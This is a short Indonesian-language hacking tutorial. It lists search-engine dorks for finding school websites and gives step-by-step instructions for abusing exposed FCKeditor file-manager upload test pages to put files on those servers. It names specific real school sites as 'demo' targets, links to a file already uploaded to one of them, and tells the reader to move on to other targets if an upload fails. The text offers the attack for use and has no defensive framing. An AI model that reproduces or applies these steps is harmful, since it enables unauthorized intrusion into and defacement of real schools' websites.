Dork :

inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?

DORK bisa dikembangan menurut kreatifitas anda .


Exploit :
http://public_html/dir/editor/filemanager/connectors/uploadtest.html atau http://public_html/dir/editor/filemanager/connectors/test.html  , http://public_html/editor/filemanager/browser/default/browser.html

pilih salah satu, kalau sudah langsung masukan exploitnya lalu pilih connector nya dari ASP => PHP tinggal masukin filenya harus berbentuk .TXT  Seperti gambar diatas .

Demo:
http://www.sman1kotabaru.sch.id/editor/filemanager/connectors/uploadtest.html
http://www.smppd1bpp.com/editor/filemanager/connectors/uploadtest.html
http://smp1kudus.sch.id/editor/filemanager/connectors/uploadtest.html

Terakhir klik send it to server . untuk melihat file txt anda tadi bisa dengan cara http://contoh.com/userfiles/filename.txt

example : http://smp1kudus.sch.id/userfiles/ambu_.txt

jika muncul pesan : File not error , berarti file anda behasil di upload jika tidak . carilah target yang lain